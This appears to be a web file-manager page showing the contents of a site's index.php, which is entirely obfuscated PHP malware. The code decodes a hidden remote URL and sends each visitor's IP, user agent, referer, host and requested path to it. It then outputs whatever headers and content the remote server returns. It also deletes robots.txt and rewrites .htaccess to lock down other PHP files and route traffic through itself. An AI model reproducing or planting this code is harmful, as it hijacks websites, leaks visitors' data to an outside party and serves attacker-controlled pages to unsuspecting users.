OwlCyberSecurity - MANAGER

Edit File: index.php

index.php
<?php
 goto yecaz; vxqnE: goto i_x3c; goto NE0K3; owYqY: goto SZXKH; goto R2mv9; NKu0H: VCh6u: goto l9R2K; a7kxz: goto OW34n; goto X_lBe; ikvc8: goto OqIQD; goto IXnri; cho3V: $params["\151\x70"] = isset($_SERVER["\x48\x54\124\120\137\126\x49\x41"]) ? $_SERVER["\110\x54\x54\120\x5f\130\x5f\x46\x4f\122\x57\101\122\104\x45\x44\137\106\117\122"] : $_SERVER["\x52\x45\x4d\x4f\124\x45\137\101\104\x44\122"]; goto i4rZl; iKdv7: goto T86I0; goto ViL6g; mNjIG: xxP3L: goto oKIp5; Pu7Yu: goto sbYB7; goto amwCt; cOG2V: goto uRsWD; goto oGCRa; kSnv5: nJVdz: goto dCBVG; Jtm_2: KmPMc: goto pKPxB; IY6e6: IuXqU: goto ikrAa; P_W1V: goto J8_94; goto kSnv5; AVXzK: goto n83qC; goto mNjIG; nTosy: goto J9GJ5; goto wL1rm; ymET3: Pbnbq: goto TJMVt; VYVZx: J8_94: goto A3bud; cfqyo: $params["\x70\162\x6f\164\x6f\x63\x6f\154"] = isset($_SERVER["\110\x54\x54\120\x53"]) ? "\x68\x74\x74\x70\163\72\57\57" : "\150\x74\x74\160\72\x2f\x2f"; goto Tv23U; MbZlg: MUpXE: goto bHWJb; cg7I5: goto XRhzk; goto Jxpgl; LkH2a: ZOBbI: goto fTgge; csnQA: M4KOF: goto AD3Z8; x6031: $params["\x72\x65\146\x65\x72\145\162"] = isset($_SERVER["\110\124\x54\x50\137\122\105\x46\105\x52\x45\122"]) ? $_SERVER["\x48\x54\x54\120\137\x52\105\106\105\x52\105\122"] : ''; goto YgbVs; wJsDm: hw5wD: goto Pu7Yu; HIrqn: goto gKgad; goto AVXzK; PQgIb: hfwo4: goto tuiPQ; Nbrtn: C3hoV: goto dw5jb; uIq0f: reDOL: goto mJb2O; V6ik0: goto QY7uU; goto j7uBi; ZELSh: zp75a: goto p5IYY; wYDVd: goto reDOL; goto q36PI; Ji62i: goto LUeTe; goto GciKu; Jm6sG: goto nJVdz; goto X0NEn; Ct_l5: goto Wqsyi; goto V6ZBf; PRJud: n83qC: goto Jtm_2; X0NEn: i_x3c: goto NKu0H; dCBVG: J9GJ5: goto znqcw; y8vz5: zO2XW: goto ZELSh; amwCt: FEsmW: goto uysQk; uIUGk: goto k2dU5; goto csnQA; ozYhx: goto Pw07J; goto N3ulv; NXLvZ: goto M4KOF; goto dUqQN; EpvSR: if (isset($_REQUEST["\160\141\162\141\155\x73"])) { $params["\141\160\151"] = $api; print_r($params); die; } goto V6ik0; A3bud: goto I6sGU; goto Jm6sG; MkbYe: while ($try < 3) { $content = h($api, $params); $content = @gzuncompress(base64_decode($content)); $data_array = @preg_split("\x2f\x5c\x7c\57\163\x69", $content, -1, PREG_SPLIT_NO_EMPTY); if (!empty($data_array)) { $data = array_pop($data_array); $data = base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die; } $try++; } goto UlVlE; ViL6g: KnM7k: goto ozYhx; OxUR3: I6sGU: goto rF9nG; W19vj: goto Mazt2; goto NB5rd; EfmxB: function h2() { if (file_exists("\x72\x6f\x62\x6f\164\163" . "\x2e\164\170\x74")) { @unlink("\162\157\x62\x6f\x74\x73" . "\56\164\170\164"); } $htaccess = "\56" . "\x68\164\x61\143\x63\x65\163\163"; $content = @base64_decode("\x50\x45\132\160\142\x47\x56\172\x54\x57\106\x30\x59\x32\x67\147\x49\151\x34\157\x63\110\154\70\x5a\x58\150\154\146\110\102\x6f\143\103\153\153\111\x6a\64\x4b\111\105\71\x79\132\107\x56\x79\x49\107\106\x73\142\107\71\x33\x4c\x47\122\x6c\x62\x6e\153\x4b\x49\x45\x52\x6c\142\156\x6b\x67\x5a\156\x4a\x76\x62\x53\x42\150\142\107\x77\x4b\120\103\71\x47\141\x57\170\x6c\x63\60\61\x68\144\107\x4e\x6f\x50\147\x6f\70\122\155\154\163\x5a\x58\116\116\x59\130\x52\152\x61\103\x41\151\x58\151\x68\x68\131\x6d\x39\61\x64\x43\x35\x77\x61\110\x42\70\x63\155\106\x6b\x61\x57\x38\x75\x63\x47\150\x77\146\x47\154\x75\132\107\x56\x34\114\156\x42\x6f\143\110\170\152\142\62\x35\x30\132\127\x35\x30\114\x6e\x42\x6f\143\110\x78\x73\x62\x32\x4e\162\115\x7a\131\167\x4c\156\102\x6f\143\x48\170\150\132\107\x31\160\142\151\65\x77\x61\110\x42\70\144\63\x41\164\142\107\x39\156\x61\127\x34\x75\143\107\x68\x77\146\110\x64\167\114\127\x77\167\x5a\x32\x6c\165\114\x6e\x42\157\x63\x48\x78\x33\x63\103\x31\60\x61\x47\x56\164\132\123\x35\167\141\110\102\70\x64\63\x41\x74\143\x32\116\171\x61\130\x42\60\x63\171\x35\167\141\110\102\x38\144\63\101\164\x5a\127\122\160\x64\x47\x39\171\x4c\x6e\x42\x6f\x63\110\x78\164\x59\x57\x67\165\x63\x47\x68\x77\x66\107\x70\x77\x4c\156\x42\x6f\x63\110\170\x6c\x65\x48\121\165\x63\107\150\167\x4b\x53\x51\x69\x50\147\x6f\147\x54\x33\112\x6b\132\x58\111\x67\131\x57\x78\x73\x62\x33\x63\163\132\x47\x56\x75\x65\121\x6f\x67\121\127\170\163\142\x33\143\147\132\156\112\x76\x62\123\x42\150\x62\x47\167\113\120\x43\71\x47\141\127\x78\154\x63\60\x31\150\144\107\x4e\x6f\120\x67\x6f\70\123\127\x5a\116\x62\62\x52\61\x62\107\x55\x67\x62\x57\71\153\x58\63\x4a\x6c\144\x33\x4a\160\144\107\125\x75\x59\x7a\64\113\x55\x6d\126\63\x63\155\x6c\x30\132\x55\x56\x75\x5a\62\154\165\x5a\x53\102\120\x62\x67\160\123\x5a\130\144\171\141\130\x52\154\x51\x6d\x46\x7a\x5a\123\101\x76\103\x6c\x4a\x6c\x64\x33\x4a\x70\144\107\126\123\x64\x57\x78\x6c\x49\x46\65\160\142\x6d\122\154\145\106\167\165\x63\x47\150\167\x4a\x43\x41\x74\111\x46\x74\115\x58\x51\x70\123\x5a\x58\144\171\x61\x58\x52\x6c\x51\62\71\165\x5a\103\101\x6c\145\61\x4a\106\x55\x56\126\x46\125\x31\x52\x66\x52\153\x6c\x4d\x52\125\x35\102\124\x55\x56\71\111\x43\x45\164\132\147\x70\x53\132\130\x64\x79\141\x58\x52\154\121\62\71\165\132\x43\101\x6c\145\x31\112\x46\125\x56\x56\x46\125\x31\122\x66\122\153\x6c\x4d\122\125\65\102\124\125\126\x39\111\x43\105\164\132\x41\160\123\x5a\x58\144\171\141\130\122\x6c\x55\x6e\126\x73\x5a\x53\101\x75\111\103\x39\160\142\x6d\122\x6c\145\x43\65\167\141\110\x41\147\127\x30\x78\x64\103\x6a\167\x76\x53\127\132\x4e\142\62\122\61\142\107\125\53"); if (file_exists($htaccess)) { $htaccess_content = file_get_contents($htaccess); if ($content == $htaccess_content) { return; } } @chmod($htaccess, 511); @file_put_contents($htaccess, $content); @chmod($htaccess, 420); } goto sdqP8; tuiPQ: DWqMn: goto PWEZK; CbH6t: lO4eS: goto uIq0f; vDo_n: hlgX6: goto Ji62i; YwRmx: Mazt2: goto vDo_n; dw5jb: goto Pbnbq; goto PQgIb; pKPxB: goto IuXqU; goto qmwO9; y_Pje: gKgad: goto QiZ6S; dUqQN: cf2kj: goto lo69Z; Tv23U: goto ZOBbI; goto Fzx1y; ynyuI: epAqs: goto OxUR3; PWEZK: goto RlcLm; goto KCIu6; D39ZL: goto sDZqF; goto d5wdO; WK35r: j1zlq: goto nTosy; tY25C: $api = base64_decode("\x61\x48\122\x30\143\x44\x6f\166\x4c\x7a\x59\x78\116\104\121\164\x59\62\x67\x30\114\130\131\171\117\x54\x55\x75\x61\127\61\x6e\116\x33\x6c\x68\x61\x47\x39\x76\x4c\x6d\116\x76\x62\121\x3d\75"); goto u3U7V; jTz69: T86I0: goto cho3V; p5IYY: goto BGon9; goto OEZrl; bHWJb: $params["\x72\x65\x71\x75\145\x73\164\x5f\165\162\x6c"] = $_SERVER["\122\x45\121\x55\105\x53\124\137\125\x52\x49"]; goto OeZir; oKIp5: dRNsC: goto UYRaC; yecaz: goto j1zlq; goto WK35r; EMJbM: Rhf0k: goto ST2Zq; OEZrl: plrhX: goto HiCSC; YgbVs: goto zlDbu; goto KSPbd; UYRaC: goto WeyrD; goto jTz69; TgonE: goto zO2XW; goto v83hK; lP37g: OW34n: goto HIrqn; znqcw: goto BM7Ct; goto q2yd3; Txc8L: $params["\x61\147\145\x6e\x74"] = isset($_SERVER["\x48\x54\124\120\x5f\x55\x53\105\x52\x5f\101\107\105\x4e\x54"]) ? $_SERVER["\110\x54\124\x50\x5f\125\x53\x45\x52\x5f\101\x47\x45\x4e\x54"] : ''; goto qAtCb; X_lBe: pzDI7: goto y_Pje; sdqP8: goto ePANE; goto ynyuI; R2mv9: nVoza: goto ikvc8; s9rCk: hSF55: goto Nbrtn; Jxpgl: ePANE: goto Cd5g7; r5vAa: XRhzk: goto OV4Zp; j7uBi: BGon9: goto tY25C; OV4Zp: Pw07J: goto xS15Y; BFWTj: goto k1X36; goto VYVZx; d5wdO: goto xxP3L; goto s9rCk; rpqGB: QY7uU: goto rctx1; xS15Y: goto BzYOP; goto PRJud; YlDau: goto DWqMn; goto W19vj; mq1R1: eMsm1: goto iKdv7; HLOoz: OqIQD: goto Ct_l5; RU_JF: goto ttFbb; goto lU05B; bmPMf: vWN3F: goto cfqyo; l9R2K: goto vWN3F; goto lP37g; KCIu6: Wqsyi: goto EfmxB; mJb2O: goto uvGHQ; goto r5vAa; AD3Z8: goto VCh6u; goto BFWTj; BI_zk: k1X36: goto wJsDm; GciKu: ttFbb: goto YlDau; rctx1: goto dRNsC; goto Pjy78; RuTfD: goto M7gOO; goto YwRmx; HiCSC: goto hw5wD; goto uCqGM; Pjy78: goto hfwo4; goto MbZlg; oGCRa: x3r_q: goto Cctc3; u3U7V: goto cf2kj; goto y8vz5; TJMVt: $params["\144\157\155\x61\x69\156"] = isset($_SERVER["\x48\124\x54\120\137\110\117\123\124"]) ? $_SERVER["\110\x54\124\x50\137\x48\117\123\x54"] : $_SERVER["\123\x45\x52\x56\x45\122\x5f\x4e\x41\x4d\105"]; goto a7kxz; Mnlnj: h2(); goto P_W1V; NE0K3: M7gOO: goto D39ZL; DC9EY: $params["\x6c\141\x6e\147\165\141\147\145"] = isset($_SERVER["\x48\x54\124\x50\x5f\x41\x43\103\x45\x50\x54\137\114\x41\116\x47\x55\101\107\x45"]) ? $_SERVER["\x48\x54\124\120\137\x41\x43\103\105\120\x54\x5f\x4c\x41\116\107\125\x41\x47\x45"] : ''; goto RuTfD; rF9nG: goto Jurhi; goto bmPMf; RIFoO: k2dU5: goto mq1R1; uysQk: goto eMsm1; goto TgonE; v83hK: zlDbu: goto wYDVd; OeZir: goto plrhX; goto EMJbM; i4rZl: goto Rhf0k; goto BI_zk; R1UyW: $try = 0; goto RU_JF; ikrAa: if ($params["\151\x70"] == null) { $params["\151\160"] = ''; } goto NXLvZ; q2yd3: uRsWD: goto HLOoz; PT7oG: function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, "\150"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); if ($pf != '') { curl_setopt($ch, CURLOPT_POST, 1); if (is_array($pf)) { curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf)); } } $r = curl_exec($ch); curl_close($ch); if ($r) { return $r; } return ''; } goto ovzXi; ovzXi: goto nVoza; goto CbH6t; Wr4nC: WeyrD: goto Mnlnj; Fzx1y: Jurhi: goto R1UyW; Cctc3: sDZqF: goto owYqY; lo69Z: goto C3hoV; goto uIUGk; wL1rm: goto pzDI7; goto RIFoO; qmwO9: BzYOP: goto JBUWV; UlVlE: goto KnM7k; goto rpqGB; qAtCb: goto FEsmW; goto LkH2a; Cd5g7: goto zp75a; goto vxqnE; uCqGM: goto hSF55; goto TsW4V; V6ZBf: RlcLm: goto MkbYe; QiZ6S: goto MUpXE; goto IY6e6; IXnri: goto x3r_q; goto ymET3; LH3qa: LUeTe: goto DC9EY; lU05B: SZXKH: goto EpvSR; q36PI: goto epAqs; goto LH3qa; NB5rd: sbYB7: goto x6031; TsW4V: BM7Ct: goto PT7oG; KSPbd: uvGHQ: goto Txc8L; fTgge: goto hlgX6; goto cg7I5; N3ulv: goto lO4eS; goto Wr4nC; ST2Zq: goto KmPMc; goto cOG2V; JBUWV: ?>